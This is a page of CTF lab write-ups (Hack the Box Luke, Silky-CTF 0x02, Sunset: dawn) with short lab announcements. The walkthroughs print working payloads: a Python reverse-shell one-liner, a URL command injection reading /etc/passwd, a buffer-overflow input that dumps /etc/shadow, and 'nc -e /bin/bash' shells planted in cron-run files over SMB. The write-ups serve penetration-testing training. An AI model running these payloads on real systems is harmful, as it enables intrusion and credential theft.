Hack the Box Luke Walkthrough

at 8:03 AM Friday, September 20, 2019 0 comments

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Luke,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Luke is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.
Level: Easy
Task: Find user.txt and root.txt in the victim’s machine
Penetration Methodologies
Scanning
    Nmap
Enumeration
    Logging in FTP as anonymous
    Browsing HTTP service
    Directory Scanning using Dirsearch
Exploitation
    Extracting Authentication token using curl   
    Extracting User information using curl
    Extracting Password using curl
Privilege Escalation
    Logging in Ajenti Panel
Capturing the flag
Walkthrough
Network Scanning
Let’s get started then!
Since these labs have a static IP, the IP address for Luke is 10.10.10.137. Let us scan the VM with the most popular port scanning tool, nmap.
nmap -A 10.10.10.137

From the result above we found five working ports on the VM, port 21, 22, 80, 3000, 8000.
Here, we can saw that FTP allow anonymous login. So, we check it.
ftp 10.10.10.137
ftp> ls
ftp> cd webapp
ftp> ls
ftp> get for_Chihiro.txt

Through FTP login we found a for_Chihiro.txt file, where Chihiro or Derry might be usernames.
cat for_Chihiro.txt

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us some directories and files namely config.php, management etc.
./dirsearch.py -u http://10.10.10.137 -e php -x 400, 403, 404

We enumerated all of them. Among which config.php gave us some database credentials as shown in the image below.

We tried credentials on 10.10.10.137/management. But it gave back an unauthorized error. We will come back to it again.

Back to our nmap scan, we found that a Nodejs service running on port 3000. On browsing the IP Address with 3000 port, we got a message that says that auth token is not supplied.

We further did a Directory Bruteforce on port 3000. We found pages named /login and /users.
./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400, 403, 404

After a bit of research, we can use curl command to authenticate JWT token. For more you can read this article from here.
The trick part here is the username is admin and not root which we guessed.
So, the curl command with the admin as username and password we got earlier.
curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login
This gave us the auth token.

We enumerated usernames using the curl command with the help of the Authentication token we found earlier. This gave use users information as shown in the image given below.
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

We enumerated all users using the curl command. This gave use password for those users as shown in the image given below.
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310’ http://10.10.10.137:3000/users/Derry

We logged in the management page successfully using the credentials of user Derry.
User Name: Derry
Password rZ86wwLvx7jUxtch

After logging in we found a files named config.json, config.php and login.php. We enumerated all these files among which config.json seemed intresting.


The config.json file had some information related to ‘ajenti’ service running on port 8000 and a password.


We browsed the IP Address with the port 8000, It gave us another login form. We used the following credentials into the form. This successfully gave us the ajenti panel as shown in the image given below:
Username: root
Password: KpMasng655EtTy9Z

After Enumerating a bit, we saw the option to open terminal. On opening the terminal, we checked the user and group details using id command. It is root shell. Here we enumerated the shell for user and root flags.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.

Labels:

Silky-CTF: 0x02 Vulhub Walkthrough

at 7:20 AM Tuesday, September 17, 2019 0 comments


Today we will be solving a boot2root lab from Vulnhub called SILKY-CTF: 0x02. This lab is a good way to keep your penetration testing skills on point while getting some variety.
Download it from HERE
Level: Easy-Intermediate
Task: Boot to Root (flag.txt)
Penetration Methodologies
Scanning
  • Netdiscover
  • Nmap
Enumeration
  • Directory Scanning using DIRB
  • Giving Credentials For Admin Login
Exploitation
  • Exploiting Command Injection Vulnerability
  • Fuzzing to exploit LFI Vulnerability
  • Reading /etc/passwd file
  • Getting a reverse connection using Python Reverse Shell
  • Spawning a TTY Shell
Privilege Escalation
  • Getting SUID File
  • Exploiting Buffer Overflow Vulnerability using Bad Chars and Python Script
  • Decoding Hashes using John
Capturing the flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.
netdiscover

We found target IP Address 192.168.1.23. Let’s begin with basic port scanning with NMAP
nmap -A -sV 192.168.0.23

Enumeration
NMAP scanning result wasn’t much useful to us. So, we thought of executing Directory Brute force in order to enumerate the machine further. This gave us a directory “admin.php”. This seems quite interesting.
.
After browsing the directory on the browser, it turned out to be Admin Login Panel. This might be useful to follow up.

We Clicked on Login and Got a Login form to give Admin’s Username & Password. We tried different methods to access Admin Panel but were shutdown.

We thought of logging in with random credentials.

Noticing the error was in German Language. That’s Different!!

Exploitation
After spending a few time looking for a way. It clearly strikes to check LFI in the URL as shown in the image. We have successfully executed the ls command which means it is vulnerable to command injection.

To confirm the LFI, we did some Fuzzing and found the /etc/passwd file.
192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd

Moving on, we looked for a Flag.txt in the Silky home directory.
192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt

It’s time to execute a Python Reverse Shell to get a reverse connection. But before executing the shell establish a Netcat listener on your machine. Given below is the Python reverse shell we have used in the URL to obtain a reverse connection on our Netcat listener.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Oh Yeah!! We got the reverse shell on our Netcat listner, but it is not a proper shell. We will spawn this tty shell using python.
nc -lvp 4444
python -c ‘import pty;pty.spawn(“/bin/bash”)’     

While enumerating the directories of the machine, we found a SUID file cat_shadow. This might come in handy. Let’s see.

On checking what this file actually does by executing it. We noticed it’s trying to read the shadow file but on the other hand we got a permission denied.
./cat_shadow
./cat_shadow silky

We clearly knew, we need to send that HEX value since it seemed it is vulnerable to Buffer Overflow Vulnerability.
./cat_shadow $(python -c ‘print “A”*100’)

After some trials, we wrote a simple python script to write 64 bad characters of “A” and then adds the value of “0x496c5962” in little-endian format and provide the result as input to the “cat_shadow” file and was able to read the “/etc/shadow” file.
./cat_shadow $(python -c ‘print “A”*64 + “\x62\x59\x6c\x49”’)

Now we have simply copied the hashes in a file on our Kali Linux and Fired UP!! John to decode the hashes. After sometime, we got the password for root. I guess there is only one thing left to do is to read our Final Flag.

We logged in to Root User using the found credentials and easily got our way to the Final Flag.



Labels:

HA:Infinity Stones CTF Challneges

at 12:29 AM Monday, September 16, 2019 0 comments

Thanos thinks that if he kills half of all life in the universe, he’ll restore balance. To do so, he needs all six Infinity Stones to power his Infinity Gauntlet, which in turn will give him the ability to bend time, space, energy, and the laws of physics and reality. But the Avengers are one step ahead of Thanos this time. Avengers have hidden all the Infinity Stones all over this CTF. Help Thanos to get all the Infinity Stones and restore the balance of the universe.

This machine contains 6 Infinity Stones with Six different flags to test your skills.

1. Space Stone
2. Mind Stone
3. Reality Stone
4. Time Stone
5. Power Stone
6. Soul Stone

Each stone can be found with a different way.

                                                       ENUMERATION IS THE KEY !!!!!

https://drive.google.com/file/d/1kLXbHgdx92YRJLdRnf_EVZWEulA0MYYo/view?usp=sharing

Labels:

Wordy: CTF Challenge

at 9:47 AM Saturday, September 14, 2019 0 comments

Wordy is design for beginners to experience real life Penetration testing. This lab is completely dedicated to Web application testing and there are several vulnerabilities that should be exploited in multiple ways. Therefore, it is not only intended as a root challenge boot, the primary agenda is proactive in exploiting tops listed web application vulnerabilities. 
As this is a wordpress based lab, it is designed so that users can practice following vulnerabilities:
·        LFI
·        RFI
·        CSRF
·        File Upload
·        SQL

Download: here

Labels:

Sunset: dawn Vulnhub Walkthrough

at 10:50 PM Monday, September 9, 2019 0 comments

Today we are going to solve another CTF challenge called “Sunset: dawn”. It is available on Vulnhub for the purpose of Penetration Testing practices. This is a box from the Sunset series. The credit for making this lab goes to “whitecr0wz”. Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology
Network Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Browsing HTTP Service
·        Performing Directory Bruteforce
·        Enumerating log files
·        Enumerating SMB using Enum4linux
Exploiting
·        Connecting via SMB
·        Sending files with netcat invocation
Privilege Escalation
·        SUID bit on zsh

Capture the flag

Walkthrough

Network Scanning
We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover
This was found out to be 192.168.1.165.



Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.
nmap -A 192.168.1.165
We learned from the scan that we have the port 80 open which is hosting Apache httpd service, and we have the port 139,445,3306 open. This tells us that we have the NetBIOS and MySQL service running on the target machine respectively.



Enumeration
Since we got the port 80 open, we decided to browser the IP Address in the browser. We were given an unavailable error as shown in the given image.



We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called “logs” as shown in the given image.
dirb http://192.168.1.165/



Upon finding the logs directory, we opened the URL in our browser. This gave us a bunch of different log files like auth.log, daemon.log, error.log and management.log. We tried to access the all those log files but we got forbidden message in all except management.log.



So, we downloaded the management.log and used cat command to open the management.log on our attacker machine (Kali Linux). Here we see that we have a directory named “ITDEPT”. It contains two files namely product-control and web-control. As these files were mentioned with cron, we can safely say that these files are getting executed by some background task.
cd Downloads
cat management.log



Back to the nmap port scan, we found that the there is a NetBIOS SMB. Its time to enumerate this machine’s SMB Service. There are multiple ways to do this about which you can learn from here. Here we decided to use the Enum4Linux script. This shows that we have the ITDEPT directory we found earlier. This means this directory is accessible through SMB.
enum4linux -a 192.168.1.165



Also, as we explored the result of Enum4Linux, we saw that we have two users namely, “dawn” and” ganimedes”.



Exploitation
Since, we found the ITDEPT directory in our enumeration. We tried to access it using the SMB as shown in the image. We gave a blank password to login. Upon logging in we ran the ls command. We found nothing in it. We ran the ls command again with the -al parameters to see if we missed any hidden files but we couldn’t find any.
smbclient //192.168.1.165/ITDEPT
ls
ls -al



But this doesn’t mean that we cannot create any file in it. We went back to our terminal and created the files by the name of “product-control” and “web-control”. We created the files by this name because earlier while enumerating the management.log file we saw that files with this name were executed after some time again and again using cron. We also entered the netcat shell invocation script in those files using the echo command as well.
echo “nc -e /bin/bash -lvp 1234 &” > product-control
echo “nc -e /bin/bash -lvp 1234 &” > web-control
ls



Now back to the SMB shell, we transferred the files that we just created to the target system using put command. Both the files were successfully transferred. After the transfer, we ran the ls command to check whether the files were indeed on the system or not. As seen in the image given below, we have put our files on the target system. 
put product-control
put web-control
ls



Now, we went back to our browser, to see the log directory. From there we downloaded the management.log file again. We did this as if those files we just created were executed or not. As show in the image, the files were successfully executed by the cron on the target system.



Now we ran the netcat to get this session on the target machine. We get our shell through netcat. This was an improper shell. So, we used the python one-liner to convert this into a proper shell. On conversion we saw that the shell we got was of user dawn.
nc 192.168.1.165 1234
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Privilege Escalation
Now that we had a shell, it was regular practice to check for any file having SUID permissions with the help of Find command. By using the following command, we enumerated all binaries having SUID permissions:
find / -perm -u=s -type f 2>/dev/null
whoami
/usr/bin/zsh
whoami
cd /root
ls
cat flag.txt
The Find command gave us that the zsh command can help us escalate privilege on this machine. We ran the zsh command and checked our status using the whoami command. We got root. Now it was time to enumerate for the flag. We traversed into the root directory and found the flag.txt file. This concludes this CTF.



Labels:
Subscribe to: Posts (Atom)